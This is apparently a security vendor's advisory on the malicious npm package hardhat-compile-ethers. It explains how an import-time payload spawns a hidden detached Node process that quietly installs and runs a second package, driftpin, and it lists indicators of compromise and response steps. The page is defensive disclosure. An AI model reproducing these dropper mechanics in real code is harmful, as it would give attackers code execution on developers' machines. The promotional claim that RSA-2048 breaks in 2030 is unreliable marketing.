Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
Malicious package

hardhat-compile-ethersnpm

Malicious code in hardhat-compile-ethers (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-6705
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall hardhat-compile-ethers

What this malware does

The package's main entry dist/src/index.js contains a payload appended after the legitimate Hardhat exports. On require/import (e.g. when Hardhat loads the user's config), it spawns a detached Node child (spawn(process.execPath, ['-e', code], {detached:true, stdio:'ignore', windowsHide:true})) that runs a base64-decoded command to silently npm install driftpin --no-save --silent --no-audit --no-fund, then require('driftpin') and invoke getPlugin()(), executing attacker-controlled code in the installer's Node process. Both the shell command and the module name 'driftpin' are base64-encoded to hide them from casual inspection, and the spawn options (detached, stdio ignored, windows window hidden) are evasion mechanics. The payload is absent from the TypeScript source (src/index.ts) and only appears in the published dist artifact, indicating post-build injection. The package name mimics legitimate Hardhat/ethers plugins (e.g. @nomicfoundation/hardhat-ethers, hardhat-deploy-ethers) and the README is copied from wighawag/hardhat-deploy, making this a typosquat that delivers a dependency-chain dropper. Installers are typically Hardhat development machines that hold wallet keys and signing material, making arbitrary code execution on import especially damaging.

Malicious versions

13 flagged
0.0.10.4.00.4.20.4.30.4.40.4.50.4.60.4.70.4.80.4.90.4.100.4.110.4.12

Indicators of compromise (SHA-256)

180936274762437e2311a83f716cbbf9fcaaaef8e194b950bfa28192bfb44bf8
2852e841d953072a439342e58a63f91a6f4047c122d337ad57bc4f4adad45f81
3bb9781577ff17698d2cb66a6cd832fe8bdda014b30c0c662055a45d42801ac1
51a9a1265ba62d0c900be1a70b6fb28386f2e25cc3e31855fc5b3f58530cae47
70318ad0a21e7e2e412adfb362788a771ff49831a01481de94c60d7903634f36
95bb3eefd23fcfaf7a9da242c86085f6b7d1cda8344a82a8219789beefe60c12
a1d54b1992fb2f6fa590ca2b76dd65574a18a0659f43294aa2fdf0588abe4062
d572224fcf90c82c0626008128d7a1fd790e480ec4c3b4fa5292eeb3d610bf81
dee0fafd7c2ba309f9b3b1ae8f7e4d54c9d82c630bdbaa176044b9e054cf08c9
55a890434cfd92fb846ba508acebf110f286a083dc029651ebecb781528e6f39
845a969efc54f4b45826b4bd051aa1adea7c2a983ce97e0665e0c7107f4f2ce3
c807ea26446e2a048c154c7a3c035c22db3c42ceede57a307195256a3f11e540
d1e4d2af59e7b9e792f78d9335e437080b45295155a778e9d336e23f809e325f

Detection & response playbook

Credential / info stealer
  1. Find it

    Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for hardhat-compile-ethers (13 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging hardhat-compile-ethers across your stack and pipelines.

  2. If you installed it — respond

    hardhat-compile-ethers is built to steal secrets, so assume every credential the build or runtime could read is compromised. Remove it from your project and lockfile, then rotate ALL exposed secrets — npm/registry tokens, cloud keys, CI/CD secrets, SSH keys, and any .env values — from a known-clean machine. Audit logs for unauthorized use of those credentials.

  3. Did it already run?

    If hardhat-compile-ethers was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.

  4. How O3 protects you

    O3 blocks hardhat-compile-ethers before install through its supply-chain scanner, and if it has already run, detects and severs the exfiltration or C2 callback at runtime through L7 egress monitoring and eBPF.

Frequently asked questions

No. hardhat-compile-ethers on npm has been identified as a malicious package (versions 0.0.1, 0.4.0, 0.4.2, 0.4.3, 0.4.4, 0.4.5, 0.4.6, 0.4.7, and 5 more flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-007865IN-MAL-2026-007863IN-MAL-2026-007856IN-MAL-2026-007861IN-MAL-2026-007864IN-MAL-2026-007866IN-MAL-2026-007870IN-MAL-2026-007869IN-MAL-2026-007867IN-MAL-2026-007872IN-MAL-2026-007868IN-MAL-2026-007871IN-MAL-2026-007862

References

Credits

  • Amazon Inspector · finder

Detect & block this

O3 blocks hardhat-compile-ethers-class packages before install and in CI — and if it already ran, its runtime egress monitoring catches the credential exfiltration and severs the channel.

hardhat-compile-ethers (npm) malicious package — MAL-2026-6705 | O3 Security